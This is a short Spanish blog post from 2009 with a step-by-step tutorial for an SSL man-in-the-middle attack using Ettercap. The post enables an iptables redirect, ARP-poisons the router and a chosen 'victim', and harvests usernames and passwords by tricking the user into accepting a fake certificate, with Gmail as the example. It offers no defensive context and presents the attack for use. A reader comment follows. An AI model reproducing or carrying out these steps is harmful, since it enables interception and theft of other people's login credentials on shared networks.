lunes, enero 05, 2009

Spoofing SSL

Por fin puedo hacer lo que hasta la fecha solo sabía hacer con Caín bajo Windows. Se trata de Ettercap, ya hablé de esta herramienta en una anterior ocasión, pero esta vez la cosa va mas allá, vamos a engañar al usuario para que acepte un certificado falso y así poder sacar su nombre de usuario y su password.
Primero instalamos la aplicación:
apt-get install ettercap

Ahora configuramos Ettercap para que sea capaz de tratar con SSL, editamos el fichero /etc/etter.conf
vi /etc/etter.conf

Descomentamos la línea:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Ahora entramos en modo consola como root:
ettercap -C

Nos dirigimos al menú Sniff --> Unified Sniffing

Buscamos los Hosts de nuestra red:
Hosts -->Scan for Hosts

Listamos los Hosts encontrados:
Hosts-->Host List
Presionamos 1 para la IP del Router y 2 para la IP de la víctima.

Empezamos el envenenamiento de las tablas ARP:
MITM-->ARP Poisoning
En parameters escribimos remote

Empezamos el ataque:
Start-->Start Sniffing

En la parte inferior "User Messages" podremos ver el usuario y su correspondiente password.
Dejo una captura de un usuario imaginario accediendo a Gmail:

1 comentario:

//carlos dijo...

loco, que hacia tiempo que no me pasaba por aqui.

veo que sigue adelante y que empiezas a despegar. ole, sigue asi tio. un abrazo!!